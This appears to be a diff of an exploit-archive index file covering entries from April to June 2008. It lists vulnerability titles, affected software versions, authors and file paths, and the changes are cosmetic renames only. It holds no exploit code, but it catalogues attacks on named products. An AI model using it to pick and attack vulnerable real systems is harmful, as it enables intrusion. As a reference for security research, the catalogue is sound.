Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 - Unchecked Local Buffer Overflow",2008-04-21,c0ntex,windows,local,0 5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) SQL Injection",2008-04-21,U238,php,webapps,0 @@ -5119,17 +5120,17 @@ id,file,description,date,author,platform,type,port 5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) SQL Injection",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0 5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps,0 -5486,platforms/php/webapps/5486.txt,"Wordpress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 +5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0 5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",windows,remote,0 -5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 +5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 -5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - .srt File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local,0 -5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0 +5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local,0 +5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authentication SQL Injection",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0 -5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 +5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow",2008-04-25,j0rgan,windows,local,0 5499,platforms/php/webapps/5499.txt,"siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 @@ -5148,8 +5149,8 @@ id,file,description,date,author,platform,type,port 5512,platforms/php/webapps/5512.pl,"Joomla Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla Component paxxgallery 0.2 - (gid) Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 -5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 - (mailto: scheme) Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0 -5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 +5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0 +5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - 'win32k.sys' Privilege Escalation (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 @@ -5168,7 +5169,7 @@ id,file,description,date,author,platform,type,port 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP - 'comments.php id' SQL Injection",2008-05-03,His0k4,php,webapps,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilities",2008-05-03,"Luigi Auriemma",multiple,remote,0 -5535,platforms/php/webapps/5535.txt,"Smartblog - 'index.php tid' SQL Injection",2008-05-03,His0k4,php,webapps,0 +5535,platforms/php/webapps/5535.txt,"SmartBlog - 'index.php tid' SQL Injection",2008-05-03,His0k4,php,webapps,0 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - (rconpass) Remote Heap Overflow",2008-05-03,SkOd,windows,remote,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injections",2008-05-03,InjEctOr5,php,webapps,0 5538,platforms/php/webapps/5538.txt,"cplinks 1.03 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 @@ -5192,7 +5193,7 @@ id,file,description,date,author,platform,type,port 5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 -5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 +5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0 5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0 @@ -5206,12 +5207,12 @@ id,file,description,date,author,platform,type,port 5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 -5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion Exploit",2008-05-09,cOndemned,php,webapps,0 -5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 +5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0 +5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0 -5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0 +5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0 5583,platforms/php/webapps/5583.php,"Joomla Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0 -5584,platforms/windows/local/5584.c,"Open Office.org 2.31 - swriter Local Code Execution Exploit",2008-05-10,Marsu,windows,local,0 +5584,platforms/windows/local/5584.c,"Open Office.org 2.31 - swriter Local Code Execution",2008-05-10,Marsu,windows,local,0 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0 5587,platforms/php/webapps/5587.pl,"Joomla Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0 @@ -5231,7 +5232,7 @@ id,file,description,date,author,platform,type,port 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0 -5605,platforms/php/webapps/5605.txt,"e-107 Plugin zogo-shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0 +5605,platforms/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0 5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) SQL Injection",2008-05-13,His0k4,php,webapps,0 5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps,0 @@ -5240,15 +5241,15 @@ id,file,description,date,author,platform,type,port 5611,platforms/php/webapps/5611.txt,"Linkspile - 'link.php cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 -5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - (detail.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 +5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 -5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 -5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 +5617,platforms/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 +5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0 -5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 +5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local,0 @@ -5258,7 +5259,7 @@ id,file,description,date,author,platform,type,port 5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0 -5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 +5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0 @@ -5266,10 +5267,10 @@ id,file,description,date,author,platform,type,port 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Blind SQL Injection",2008-05-17,His0k4,php,webapps,0 -5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 +5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion",2008-05-17,0in,php,webapps,0 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 -5643,platforms/php/webapps/5643.txt,"Ajax framework - (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 +5643,platforms/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 @@ -5281,7 +5282,7 @@ id,file,description,date,author,platform,type,port 5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0 5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps,0 5654,platforms/php/webapps/5654.txt,"EntertainmentScript - 'play.php id' SQL Injection",2008-05-19,Mr.SQL,php,webapps,0 -5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 +5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,php,webapps,0 5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0 5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0 5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) SQL Injection",2008-05-20,Niiub,php,webapps,0 @@ -5306,23 +5307,23 @@ id,file,description,date,author,platform,type,port 5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - (search) SQL Injection",2008-05-27,The:Paradox,php,webapps,0 5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 -5680,platforms/php/webapps/5680.txt,"OtomiGen.X 2.2 - (lang) Local File Inclusion",2008-05-27,Saime,php,webapps,0 +5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0 5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,windows,remote,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 5685,platforms/php/webapps/5685.txt,"FlashBlog - (articulo_id) SQL Injection",2008-05-28,HER0,php,webapps,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 -5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0 -5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - (fckeditor) Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0 +5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0 -5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 @@ -5334,7 +5335,7 @@ id,file,description,date,author,platform,type,port 5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0 -5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authenticated)",2008-05-31,securfrog,windows,dos,0 +5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)",2008-05-31,securfrog,windows,dos,0 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 @@ -5343,13 +5344,13 @@ id,file,description,date,author,platform,type,port 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 -5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - (username) Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 +5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 -5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 +5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0 -5724,platforms/php/webapps/5724.txt,"pLog - (albumId) SQL Injection",2008-06-02,DreamTurk,php,webapps,0 +5724,platforms/php/webapps/5724.txt,"pLog - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps,0 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 @@ -5357,16 +5358,16 @@ id,file,description,date,author,platform,type,port 5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0 5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX - Remote Download and Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 -5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 +5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0 -5736,platforms/php/webapps/5736.txt,"1Book GuestBook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 -5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 +5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 +5737,platforms/php/webapps/5737.pl,"Joomla Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 - (gbid) SQL Injection",2008-06-04,ZAMUT,php,webapps,0 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 -5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 +5743,platforms/php/webapps/5743.txt,"Joomla Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote Buffer Overflow Exploit (1)",2008-06-05,shinnai,windows,remote,0 @@ -5374,18 +5375,18 @@ id,file,description,date,author,platform,type,port 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 -5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 +5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 